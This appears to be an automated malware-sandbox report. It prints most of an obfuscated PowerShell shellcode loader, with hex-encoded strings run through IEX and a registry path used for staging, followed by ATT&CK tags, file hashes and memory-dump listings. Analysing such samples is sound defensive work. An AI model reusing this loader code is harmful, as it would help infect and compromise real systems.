'86A9A4B6B6E9E595B0A7A9ACA6E9E596A0A4A9A0A1E9E584ABB6AC86A9A4B6B6E9E584B0B1AA86A9A4B6B6';$Apology2=Keltisk0 '8CABB3AAAEA0';$Apology3=Keltisk0 '95B0A7A9ACA6E9E58DACA1A087BC96ACA2E9E58BA0B296A9AAB1E9E593ACB7B1B0A4A9';$Apology4=Keltisk0 '93ACB7B1B0A4A984A9A9AAA6';$Apology5=Keltisk0 'ABB1A1A9A9';$Apology6=Keltisk0 '8BB195B7AAB1A0A6B193ACB7B1B0A4A988A0A8AAB7BC';$Apology7=Keltisk0 '8C809D';$Apology8=Keltisk0 '99';$Carinulate=Keltisk0 '90968097F6F7';$Jeropiga=Keltisk0 '86A4A9A992ACABA1AAB295B7AAA684';function fkp {Param ($Endangers, $Minionly) ;$Firmaflasker0 =Keltisk0 'E1AEAAABA6ACB5A0B7ACABA2A0ABB6E5F8E5ED9E84B5B581AAA8A4ACAB98FFFF86B0B7B7A0ABB181AAA8A4ACABEB82A0B184B6B6A0A8A7A9ACA0B6EDECE5B9E592ADA0B7A0E88AA7AFA0A6B1E5BEE5E19AEB82A9AAA7A4A984B6B6A0A8A7A9BC86A4A6ADA0E5E884ABA1E5E19AEB89AAA6A4B1ACAAABEB96B5A9ACB1EDE184B5AAA9AAA2BCFDEC9EE8F498EB80B4B0A4A9B6EDE195B0B7ACB3B6ACA2B1A0F5ECE5B8ECEB82A0B191BCB5A0EDE195B0B7ACB3B6ACA2B1A0F4EC';&($Apology7) $Firmaflasker0;$Firmaflasker5 = Keltisk0 'E18DA4B1A6ADE5F8E5E1AEAAABA6ACB5A0B7ACABA2A0ABB6EB82A0B188A0B1ADAAA1EDE195B0B7ACB3B6ACA2B1A0F7E9E59E91BCB5A09E9898E585EDE195B0B7ACB3B6ACA2B1A0F6E9E5E195B0B7ACB3B6ACA2B1A0F1ECEC';&($Apology7) $Firmaflasker5;$Firmaflasker1 = Keltisk0 'B7A0B1B0B7ABE5E18DA4B1A6ADEB8CABB3AAAEA0EDE1ABB0A9A9E9E585ED9E96BCB6B1A0A8EB97B0ABB1ACA8A0EB8CABB1A0B7AAB596A0B7B3ACA6A0B6EB8DA4ABA1A9A097A0A398ED8BA0B2E88AA7AFA0A6B1E596BCB6B1A0A8EB97B0ABB1ACA8A0EB8CABB1A0B7AAB596A0B7B3ACA6A0B6EB8DA4ABA1A9A097A0A3EDED8BA0B2E88AA7AFA0A6B1E58CABB195B1B7ECE9E5EDE1AEAAABA6ACB5A0B7ACABA2A0ABB6EB82A0B188A0B1ADAAA1EDE195B0B7ACB3B6ACA2B1A0F0ECECEB8CABB3AAAEA0EDE1ABB0A9A9E9E585EDE180ABA1A4ABA2A0B7B6ECECECECE9E5E188ACABACAAABA9BCECEC';&($Apology7) $Firmaflasker1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Forehook,[Parameter(Position = 1)] [Type] $Eksposeer = [Void]);$Firmaflasker2 = Keltisk0 'E184A3B6B1ACB3ABACABA2B6B1A8A8A0B7B6E5F8E59E84B5B581AAA8A4ACAB98FFFF86B0B7B7A0ABB181AAA8A4ACABEB81A0A3ACABA081BCABA4A8ACA684B6B6A0A8A7A9BCEDED8BA0B2E88AA7AFA0A6B1E596BCB6B1A0A8EB97A0A3A9A0A6B1ACAAABEB84B6B6A0A8A7A9BC8BA4A8A0EDE195B0B7ACB3B6ACA2B1A0FDECECE9E59E96BCB6B1A0A8EB97A0A3A9A0A6B1ACAAABEB80A8ACB1EB84B6B6A0A8A7A9BC87B0ACA9A1A0B784A6A6A0B6B698FFFF97B0ABECEB81A0A3ACABA081BCABA4A8ACA688AAA1B0A9A0EDE195B0B7ACB3B6ACA2B1A0FCE9E5E1A3A4A9B6A0ECEB81A0A3ACABA091BCB5A0EDE184B5AAA9AAA2BCF5E9E5E184B5AAA9AAA2BCF4E9E59E96BCB6B1A0A8EB88B0A9B1ACA6A4B6B181A0A9A0A2A4B1A098EC';&($Apology7) $Firmaflasker2;$Firmaflasker3 = Keltisk0 'E184A3B6B1ACB3ABACABA2B6B1A8A8A0B7B6EB81A0A3ACABA086AAABB6B1B7B0A6B1AAB7EDE195B0B7ACB3B6ACA2B1A0F3E9E59E96BCB6B1A0A8EB97A0A3A9A0A6B1ACAAABEB86A4A9A9ACABA286AAABB3A0ABB1ACAAABB698FFFF96B1A4ABA1A4B7A1E9E5E183AAB7A0ADAAAAAEECEB96A0B18CA8B5A9A0A8A0ABB1A4B1ACAAAB83A9A4A2B6EDE195B0B7ACB3B6ACA2B1A0F2EC';&($Apology7) $Firmaflasker3;$Firmaflasker4 = Keltisk0 'E184A3B6B1ACB3ABACABA2B6B1A8A8A0B7B6EB81A0A3ACABA088A0B1ADAAA1EDE184B5AAA9AAA2BCF7E9E5E184B5AAA9AAA2BCF6E9E5E180AEB6B5AAB6A0A0B7E9E5E183AAB7A0ADAAAAAEECEB96A0B18CA8B5A9A0A8A0ABB1A4B1ACAAAB83A9A4A2B6EDE195B0B7ACB3B6ACA2B1A0F2EC';&($Apology7) $Firmaflasker4;$Firmaflasker5 = Keltisk0 'B7A0B1B0B7ABE5E184A3B6B1ACB3ABACABA2B6B1A8A8A0B7B6EB86B7A0A4B1A091BCB5A0EDEC';&($Apology7) $Firmaflasker5 ;}$Autonomiseret = Keltisk0 'AEA0B7ABA0A9F6F7';$Firmaflasker6 = Keltisk0 'E191A4A9A0B1ACA1A0ABB6E5F8E59E96BCB6B1A0A8EB97B0ABB1ACA8A0EB8CABB1A0B7AAB596A0B7B3ACA6A0B6EB88A4B7B6ADA4A998FFFF82A0B181A0A9A0A2A4B1A083AAB783B0ABA6B1ACAAAB95AAACABB1A0B7EDEDA3AEB5E5E184B0B1AAABAAA8ACB6A0B7A0B1E5E184B5AAA9AAA2BCF1ECE9E5ED828191E585ED9E8CABB195B1B798E9E59E908CABB1F6F798E9E59E908CABB1F6F798E9E59E908CABB1F6F798ECE5ED9E8CABB195B1B798ECECEC';&($Apology7) $Firmaflasker6;$Sknneste = fkp $Apology5 $Apology6;$Firmaflasker7 = Keltisk0 'E196A6B0A9B5B1B0B7A0B6B4B0A0A9BCF6E5F8E5E191A4A9A0B1ACA1A0ABB6EB8CABB3AAAEA0ED9E8CABB195B1B798FFFF9FA0B7AAE9E5F3F0F1E9E5F5BDF6F5F5F5E9E5F5BDF1F5EC';&($Apology7) $Firmaflasker7;$Firmaflasker8 = Keltisk0 'E187AAB1A4ABACB6A0B6E5F8E5E191A4A9A0B1ACA1A0ABB6EB8CABB3AAAEA0ED9E8CABB195B1B798FFFF9FA0B7AAE9E5FDF1FDFCF6F3FCF3E9E5F5BDF6F5F5F5E9E5F5BDF1EC';&($Apology7) $Firmaflasker8;$Sculpturesquely00='HKCU:\Adeste\Saltets';$Sculpturesquely01 =Keltisk0 'E196B0A9B1A0B6B1B7A0AFAEA0B7ABA0F8ED82A0B1E88CB1A0A895B7AAB5A0B7B1BCE5E895A4B1ADE5E196A6B0A9B5B1B0B7A0B6B4B0A0A9BCF5F5ECEB80A3B1A0B7B0A1A1A4ABABA0';&($Apology7) $Sculpturesquely01;$Firmaflasker9 = Keltisk0 'E183ACB7A8A4A3A9A4B6AEA0B7E5F8E59E96BCB6B1A0A8EB86AAABB3A0B7B198FFFF83B7AAA887A4B6A0F3F196B1B7ACABA2EDE196B0A9B1A0B6B1B7A0AFAEA0B7ABA0EC';&($Apology7) $Firmaflasker9;$Sultestrejkerne0 = Keltisk0 '9E96BCB6B1A0A8EB97B0ABB1ACA8A0EB8CABB1A0B7AAB596A0B7B3ACA6A0B6EB88A4B7B6ADA4A998FFFF86AAB5BCEDE183ACB7A8A4A3A9A4B6AEA0B7E9E5F5E9E5E5E196A6B0A9B5B1B0B7A0B6B4B0A0A9BCF6E9E5F3F0F1EC';&($Apology7) $Sultestrejkerne0;$Apologizer=$Firmaflasker.count-654;$Sultestrejkerne1 = Keltisk0 '9E96BCB6B1A0A8EB97B0ABB1ACA8A0EB8CABB1A0B7AAB596A0B7B3ACA6A0B6EB88A4B7B6ADA4A998FFFF86AAB5BCEDE183ACB7A8A4A3A9A4B6AEA0B7E9E5F3F0F1E9E5E187AAB1A4ABACB6A0B6E9E5E184B5AAA9AAA2ACBFA0B7EC';&($Apology7) $Sultestrejkerne1;$Sultestrejkerne2 = Keltisk0 'E184B6BCA8B5B1AAB1A0ABB6E5F8E59E96BCB6B1A0A8EB97B0ABB1ACA8A0EB8CABB1A0B7AAB596A0B7B3ACA6A0B6EB88A4B7B6ADA4A998FFFF82A0B181A0A9A0A2A4B1A083AAB783B0ABA6B1ACAAAB95AAACABB1A0B7EDEDA3AEB5E5E186A4B7ACABB0A9A4B1A0E5E18FA0B7AAB5ACA2A4ECE9E5ED828191E585ED9E8CABB195B1B798E9E59E8CABB195B1B798E9E59E8CABB195B1B798E9E59E8CABB195B1B798E9E59E8CABB195B1B798ECE5ED9E8CABB195B1B798ECECEC';&($Apology7) $Sultestrejkerne2;$Sultestrejkerne3 = Keltisk0 'E184B6BCA8B5B1AAB1A0ABB6EB8CABB3AAAEA0EDE196A6B0A9B5B1B0B7A0B6B4B0A0A9BCF6E9E187AAB1A4ABACB6A0B6E9E196AEABABA0B6B1A0E9F5E9F5EC';&($Apology7) $Sultestrejkerne3#"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1516

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\X837EZ1RVUB0PBB6YPO6.temp

Filesize
7KB

MD5
72108fa469b6ed4b77d50ff17339d188

SHA1
40a7a38b29cc3cd6e2a53d292e6c195e3587ad38

SHA256
b7cc350ca1a75d8cd8375e3852f416f9390efe2082bf76beeefec91f17ff885b

SHA512
74d446d1aee288d50ee0952c399f2306a23ffda69ff22529538c1fbf4de52298332f2e80e96983d7eeb01ac3d9e6ea8e9c6b41ef6f4c06dfe32d4d0884e75df4

Download Submit
memory/1516-85-0x00000000023A0000-0x00000000023E0000-memory.dmp

Filesize
256KB

Download
memory/1516-94-0x00000000023A0000-0x00000000023E0000-memory.dmp

Filesize
256KB

Download
memory/1516-93-0x00000000023A0000-0x00000000023E0000-memory.dmp

Filesize
256KB

Download
memory/1516-92-0x00000000023A0000-0x00000000023E0000-memory.dmp

Filesize
256KB

Download
memory/1516-87-0x0000000004FC0000-0x0000000004FC1000-memory.dmp

Filesize
4KB

Download
memory/1516-86-0x0000000005A70000-0x000000000AB66000-memory.dmp

Filesize
81.0MB

Download
memory/1516-83-0x00000000023A0000-0x00000000023E0000-memory.dmp

Filesize
256KB

Download
memory/1516-84-0x00000000023A0000-0x00000000023E0000-memory.dmp

Filesize
256KB

Download
memory/1696-80-0x0000000002640000-0x00000000026C0000-memory.dmp

Filesize
512KB

Download
memory/1696-82-0x0000000002640000-0x00000000026C0000-memory.dmp

Filesize
512KB

Download
memory/1696-81-0x0000000002640000-0x00000000026C0000-memory.dmp

Filesize
512KB

Download
memory/1696-88-0x0000000002640000-0x00000000026C0000-memory.dmp

Filesize
512KB

Download
memory/1696-89-0x0000000002640000-0x00000000026C0000-memory.dmp

Filesize
512KB

Download
memory/1696-90-0x0000000002640000-0x00000000026C0000-memory.dmp

Filesize
512KB

Download
memory/1696-91-0x0000000002640000-0x00000000026C0000-memory.dmp

Filesize
512KB

Download
memory/1696-75-0x000000001B2B0000-0x000000001B592000-memory.dmp

Filesize
2.9MB

Download
memory/1696-79-0x0000000002640000-0x00000000026C0000-memory.dmp

Filesize
512KB

Download
memory/1696-76-0x0000000001F40000-0x0000000001F48000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing